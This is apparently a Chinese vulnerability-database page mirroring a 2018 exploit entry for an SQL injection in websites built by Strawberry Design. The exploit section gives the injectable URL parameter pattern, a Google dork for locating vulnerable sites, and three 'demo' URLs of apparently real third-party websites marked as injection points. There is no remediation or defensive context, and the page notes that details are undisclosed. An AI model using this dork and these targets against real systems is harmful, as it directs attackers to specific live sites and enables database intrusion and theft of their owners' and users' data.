design by Strawberry Design SQL Injection Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1209555 漏洞类型
发布时间 2018-06-09 更新时间 2018-06-09
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018060085
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title : design by Strawberry Design SQL Injection Vulnerability
# Date : 2018-06-08
# Exploit Author : Iran Cyber Security Group
# Vendor Homepage : strawberry-design.co.uk
# Google Dork : "design by Strawberry Design" 
# category : webapps
# Tested on : Win7 , Kali Linux

# Exploit : /index.php?content_id=[SQL Injection]

Proof of Concept : 

 search google Dork : "design by Strawberry Design" 
 Demo : 
 http://fieh.co.uk/index.php?Id=51' [Sql injection Vulnerability]
 http://www.gretajensen.com/index.php?Id=8' [Sql injection Vulnerability]
 http://movingconflicts.org/news1+.php?nID=10' [Sql injection Vulnerability] &n_start=0

# Discovered by : Mr_null